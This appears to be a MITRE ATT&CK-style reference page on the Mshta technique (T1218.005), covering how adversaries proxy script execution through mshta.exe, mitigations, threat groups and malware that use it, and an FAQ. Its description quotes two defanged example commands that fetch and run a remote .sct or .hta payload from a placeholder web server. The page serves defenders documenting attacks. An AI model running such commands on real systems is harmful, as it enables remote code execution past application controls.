Description
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
Platforms
Mitigations (2)
Execution PreventionM1038
Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the mshta.exe application and to prevent abuse.(Citation: Microsoft
Disable or Remove Feature or ProgramM1042
Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.
Threat Groups (17)
| ID | Group | Context |
|---|---|---|
| G0121 | Sidewinder | [Sidewinder](https://attack.mitre.org/groups/G0121) has used <code>mshta.exe</code> to execute malicious payloads.(Citation: Rewterz Sidewinder APT Ap... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has used <code>mshta.exe</code> to execute HTML pages downloaded by initial access documents.(C... |
| G0069 | MuddyWater | [MuddyWater](https://attack.mitre.org/groups/G0069) has used mshta.exe to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload an... |
| G0129 | Mustang Panda | [Mustang Panda](https://attack.mitre.org/groups/G0129) has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT Decembe... |
| G0140 | LazyScripter | [LazyScripter](https://attack.mitre.org/groups/G0140) has used `mshta.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citat... |
| G1018 | TA2541 | [TA2541](https://attack.mitre.org/groups/G1018) has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021) |
| G0082 | APT38 | [APT38](https://attack.mitre.org/groups/G0082) has used a renamed version of `mshta.exe` to execute malicious HTML files.(Citation: 1 - appv) |
| G0100 | Inception | [Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 20... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation... |
| G0046 | FIN7 | [FIN7](https://attack.mitre.org/groups/G0046) has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FI... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro Ear... |
| G0050 | APT32 | [APT32](https://attack.mitre.org/groups/G0050) has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason C... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 202... |
| G0142 | Confucius | [Confucius](https://attack.mitre.org/groups/G0142) has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018) |
| G0127 | TA551 | [TA551](https://attack.mitre.org/groups/G0127) has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021) |
| G1008 | SideCopy | [SideCopy](https://attack.mitre.org/groups/G1008) has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021) |
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has used `mshta.exe` to execute malicious files.(Citation: Symantec Shuckworm January 2022)(C... |
Associated Software (11)
| ID | Name | Type | Context |
|---|---|---|---|
| S0250 | Koadic | Tool | [Koadic](https://attack.mitre.org/software/S0250) can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Git... |
| S0341 | Xbash | Malware | [Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018) |
| S0414 | BabyShark | Malware | [BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20... |
| S0223 | POWERSTATS | Malware | [POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWa... |
| S1213 | Lumma Stealer | Malware | [Lumma Stealer](https://attack.mitre.org/software/S1213) has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citatio... |
| S0455 | Metamorfo | Malware | [Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) |
| S0379 | Revenge RAT | Malware | [Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019) |
| S0228 | NanHaiShu | Malware | [NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016) |
| S0589 | Sibot | Malware | [Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021) |
| S1155 | Covenant | Tool | [Covenant](https://attack.mitre.org/software/S1155) can create HTA files to install Grunt listeners.(Citation: Github Covenant) |
| S0147 | Pteranodon | Malware | [Pteranodon](https://attack.mitre.org/software/S0147) can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm... |
References
- Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
- Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
- Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
- LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
- Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
- Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
Frequently Asked Questions
What is T1218.005 (Mshta)?
T1218.005 is a MITRE ATT&CK technique named 'Mshta'. It belongs to the Stealth tactic(s). Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats levera...
How can T1218.005 be detected?
Detection of T1218.005 (Mshta) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218.005?
There are 2 documented mitigations for T1218.005. Key mitigations include: Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218.005?
Known threat groups using T1218.005 include: Sidewinder, Lazarus Group, MuddyWater, Mustang Panda, LazyScripter, TA2541, APT38, Inception.